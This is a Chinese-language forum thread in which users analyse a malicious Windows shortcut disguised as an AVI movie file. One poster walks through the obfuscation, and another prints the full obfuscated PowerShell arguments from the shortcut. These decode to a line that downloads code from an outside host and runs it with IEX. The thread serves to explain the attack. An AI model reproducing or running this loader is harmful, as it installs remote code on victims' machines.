使用.Lnk文件到Powershell的恶意软件

我猜，它运行一个带有的Powershell

• 无配置文件
• WindowStyle 1=最小化
• ExecutionPolicy ByPass=没有任何内容被阻止，也没有任何警告或提示
• 然后点源剩余的代码

让我们把这个代码分成：

( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code] 

$ShellId是一个内置的Powershell变量：

>$ShellId
Microsoft.PowerShell

因此( $shelliD[1]+$SHeLlID[13]+'x')转换为iex(=Invoke-Expression(

其余代码为([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]。我猜char数组包含ascii字符。如果是这样，我们可以将其转换为：

$aspx =

摘要：

powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."

因此，它在最小化的Powershell窗口中调用以$aspx =开头的代码，而没有警告或提示。

也许代码是通过其中一种模糊处理方法运行的。

希望能有所帮助。

我也得到了同样的结果。这个文件看起来像AVI，我很快打开它来检查电影的质量。这实际上是一条伪装得很好的捷径：

PS C:UsersphargDownloadstv> $sh = New-Object -COM WScript.Shell
PS C:UsersphargDownloadstv> $target = $sh.CreateShortcut('C:UsersphargDownloadstvA Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:UsersphargDownloadstv> $target
FullName         : C:UsersphargDownloadstvA Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:WINDOWSSystem32imageres.dll,18
RelativePath     :
TargetPath       : C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%System32WindowsPowerShellv1.0

此处的目标翻译为：

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

我打开了http://zvb.us/1，似乎我的电脑上运行了一些代码。目前，我不确定发生了什么。没有症状。。。